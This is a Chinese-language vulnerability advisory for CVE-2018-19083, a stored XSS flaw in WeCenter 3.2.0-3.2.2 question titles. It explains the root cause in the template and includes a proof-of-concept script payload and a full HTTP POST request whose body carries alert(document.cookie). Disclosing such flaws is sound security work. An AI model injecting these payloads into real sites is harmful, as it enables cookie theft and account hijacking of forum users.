CVE中文申请站

一、漏洞摘要

漏洞名称: WeCenter3.2.0-3.2.2储存型XSS
上报日期: 2018-11-02
漏洞发现者: Smi1e
产品首页: http://wenda.wecenter.com/
软件链接: http://wenda.wecenter.com/
版本: 3.2.0-3.2.2
CVE编号: CVE-2018-19083


二、漏洞概述

漏洞存在于WeCenter3.2.0/views/default/question/index.tpl.html中的第644,645,664,665行。
1.png
用户发布的问题标题经过htmlspecialchars_decode函数输出到了JS里,此处应该用htmlspecialchars() ,导致XSS漏洞。
2.png
当输入<script>alert(1)</script>后在浏览器渲染的时候,第一个</script>标签闭合了JS开头的<script>标签,从而从单引号中逃逸了出来,导致成功执行了JS代码。然后逃逸出来的单引号又闭合了下一个<script>前面的的单引号,从而导致弹窗了3次alert(1)。

三、利用代码

exp代码如下:

问题标题处输入:<script>alert(1)</script>
post数据包如下:
POST /WeCenter322/?/publish/ajax/publish_question/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 233
Cookie: lrs__Session=vvoutttrb79pa5fqgscqpdk0o2; lrs__user_login=6mdKXpYsXXBcYDxSW5FvDkK%2B%2FYr%2BIzrQEEpWa87z3kLrCBkGsZQpEnz%2FOiwHyE%2Fu5Xhn%2BqeLcDU3TT9%2Fppl1yXZclxcyrtHud9rR8EgfFyszWNY3cLkktjGsmh8Ae%2BiH
DNT: 1
Connection: close

post_hash=9e862174d7447bf2e73d591ee2090d42&attach_access_key=e91fee78235153fdff2f86281e8593e5&question_id=&ask_user_id=&category_id=1&question_content=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&question_detail=&_post_type=ajax

3.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/76/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19083
exploit-db:发布中

标签: XSS, WeCenter